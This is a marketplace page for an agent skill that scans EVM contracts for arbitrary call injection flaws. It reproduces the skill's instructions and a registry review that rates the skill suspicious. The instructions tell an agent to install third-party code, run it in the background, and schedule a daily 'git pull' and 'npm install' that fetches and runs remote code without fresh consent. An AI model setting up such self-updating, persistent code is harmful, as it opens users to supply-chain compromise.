← 返回 Skills 市场

BYOCB ArbInjectionSkill

Name: BYOCB ArbInjectionSkill
Author: cryptotooldev

作者 CryptoToolDev · GitHub ↗ · v1.0.0

cross-platform ⚠ suspicious

1372

总下载

当前安装

版本数

在 OpenClaw 中安装

/install arb-injection

功能描述

BYOCB ArbInjectionSkill: Scan EVM smart contracts for arbitrary call injection vulnerabilities. Monitor chains in real-time or scan specific addresses.

使用说明 (SKILL.md)

BYOCB ArbInjectionSkill

⚠️ Educational Tool — This skill is designed for Solidity/blockchain security researchers and auditors. Intended for educational and authorized security research purposes only. Do not use to exploit vulnerabilities without explicit permission from contract owners.

Detects dangerous CALL/DELEGATECALL patterns that allow arbitrary call injection attacks.

How It Works

ArbInjectionSkill runs automatically in the background, monitoring blockchain(s) for newly deployed contracts. When a potential vulnerability is detected, you must notify the user via their connected messaging channel (Telegram, WhatsApp, Signal, Discord, etc.).

Install

git clone https://github.com/BringYourOwnBot/arb-injection.git
cd arb-injection
npm install

Running the Monitor

Start as a background session for continuous monitoring:

node index.js \x3Cchain> [--no-llm]

Chains: eth, bsc, base, arb, op, polygon, hyper

The monitor will:

Subscribe to new blocks
Detect contract deployments
Scan bytecode for vulnerabilities
Save findings to ./results/

Alerting Users

Critical requirement: When a CRITICAL or HIGH vulnerability is flagged, notify the user immediately.

Check for new findings periodically (via heartbeat or cron):

# Find findings from last 30 minutes
find ./results -name "*.md" -mmin -30

When new findings exist with verdict CRITICAL or HIGH:

Read the .md report
Verify it's not a known false positive (see below)
Send alert via message tool to user's preferred channel

Example alert:

🚨 ArbInjection Alert: Potential vulnerability detected

Chain: BSC
Contract: 0x1234...abcd
Verdict: CRITICAL
Risk: Unprotected arbitrary CALL with user-controlled target

[Link to explorer]

Manual Scan

Scan a specific contract on-demand:

node modules/scan-arbitrary-call.js \x3Caddress> --rpc \x3Cchain>

Interpreting Results

Verdict	Action
CRITICAL	Alert user immediately
HIGH	Alert user immediately
MEDIUM	Review, alert if confirmed
LOW/SAFE	No alert needed

Results saved to ./results/ as .json and .md files.

False Positives

Do NOT alert for these patterns (safe by design):

Immutable DELEGATECALL targets (hardcoded address in bytecode)
EIP-1167 minimal proxies (clone pattern)
UUPS/Transparent proxies with access control
DEX callbacks (uniswapV3SwapCallback, etc.)
Known safe contracts: Multicall3, 1inch, Uniswap, Permit2

Verify before alerting: Check if the flagged CALL target is:

Hardcoded (immutable) → FALSE POSITIVE
From calldata/user input → REAL VULNERABILITY

Environment

Optional .env file:

ANTHROPIC_API_KEY=sk-ant-...   # For LLM deep analysis
BYBOB_OUTPUT=/custom/path      # Override results directory

Maintenance

Daily update required. Detection patterns and fixes are pushed frequently.

cd /path/to/arb-injection
git pull origin main
npm install  # If package.json changed

Schedule daily update check (09:00):

{
  "schedule": { "kind": "cron", "expr": "0 9 * * *" },
  "payload": { "kind": "systemEvent", "text": "ArbInjectionSkill daily update: git pull and npm install" },
  "sessionTarget": "main"
}

Source

Repository: https://github.com/BringYourOwnBot/arb-injection
Part of the BYOCB (Bring Your Own ClawdBot) skill collection.

安全使用建议

This skill looks like a legitimate EVM-scanning tool, but the SKILL.md asks you to clone and run third‑party Node code and to notify external messaging channels while the registry metadata declares no installs, binaries, or credentials. Before installing or running it: (1) review the GitHub repository and package.json for malicious postinstall scripts or unexpected network calls; (2) run the code in an isolated environment (VM/container) and inspect index.js and any modules that send network requests; (3) do not provide messaging API tokens or other secrets until you verify how alerts are delivered; (4) prefer running scans manually or under your own monitored service rather than allowing silent background/auto-update behavior; (5) ask the publisher to update registry metadata to list required binaries (git, node, npm), required env vars, and an install spec or provide a vetted package/release. If you cannot audit the repository, treat this skill as high-risk and avoid granting it persistent or credentialed access.

功能分析

Type: OpenClaw Skill Name: Developer: Version: Description: OpenClaw Agent Skill The skill is classified as suspicious due to its high-privilege capabilities and potential for supply chain risk. Specifically, the `SKILL.md` file instructs the OpenClaw agent to schedule a daily cron job to perform `git pull origin main` and `npm install` from `https://github.com/BringYourOwnBot/arb-injection`. While framed as maintenance, this grants the skill persistent self-update capabilities, allowing it to fetch and execute new code from a remote repository without further explicit user consent, which is a significant supply chain vulnerability. Additionally, the skill is instructed to run as a 'background session' for continuous monitoring, implying persistence, and to use a `message` tool for external communication (alerting).

能力评估

⚠ Purpose & Capability

The description (scan/monitor EVM contracts) is consistent with the runtime instructions. However, the skill metadata declares no required binaries or install steps while the SKILL.md explicitly requires git, node, and npm and a GitHub repository. The missing declaration of those runtime requirements is an incoherence.

⚠ Instruction Scope

The instructions tell the agent to git clone a repository, npm install, run node index.js as a background monitor, read and write ./results/, periodically check results, and notify users via messaging channels. Those steps involve network downloads, code execution, filesystem writes, and external notifications — all beyond what the metadata describes and granting substantial runtime discretion.

⚠ Install Mechanism

Although the registry lists no install spec, SKILL.md instructs cloning https://github.com/BringYourOwnBot/arb-injection.git and running npm install. That directs the agent to fetch and execute third‑party code (extract/run), which is higher risk and should have been declared or curated. The lack of an explicit install manifest in the registry but an explicit install flow in SKILL.md is inconsistent.

⚠ Credentials

The metadata declares no required env vars or credentials, but SKILL.md references an optional ANTHROPIC_API_KEY and suggests notifying users over channels (Telegram/WhatsApp/Signal/Discord) without specifying required tokens. This mismatch leaves unclear what secrets the skill needs and how they will be used — and the instructions ask the agent to access and possibly transmit findings externally.

⚠ Persistence & Privilege

The skill metadata does not set always:true or other persistence flags, yet the instructions assume continuous background monitoring, cron/heartbeat checks, and a daily auto-update git pull/npm install. That indicates intended persistent behavior not reflected in the registry privileges, increasing risk if the agent were to autonomously implement persistence.

如何使用

确保已安装 OpenClaw（本地或 Docker 部署）
在对话框中输入安装命令：/install arb-injection
安装完成后，直接呼叫该 Skill 的名称或使用 /arb-injection 触发
根据 Skill 的参数说明提供必要输入，即可获得结构化输出

版本历史

v1.0.0

Initial public release. - Scan EVM smart contracts for arbitrary call injection vulnerabilities. - Real-time monitoring of blockchain contract deployments on major EVM chains. - Immediate user alerts for CRITICAL and HIGH severity findings. - Manual scan capability for specific addresses. - Built-in false positive detection for common safe patterns and known contracts. - Results saved to local directory for review and alerting workflows.

v0.1.0

- Initial release of arb-injection skill for scanning EVM contracts for arbitrary call injection vulnerabilities. - Monitors supported chains in real-time or allows manual scanning of specific contract addresses. - Automatically detects and reports dangerous CALL/DELEGATECALL patterns. - Critical or high-severity findings require immediate alert to the user via their preferred messaging channel. - Built-in support for result filtering and false positive reduction, especially for proxy and DEX-related contracts. - Easy install and update instructions provided for ongoing maintenance.

元数据

Slug arb-injection

版本 1.0.0

许可证 —

累计安装 0

当前安装数 0

历史版本数 2

常见问题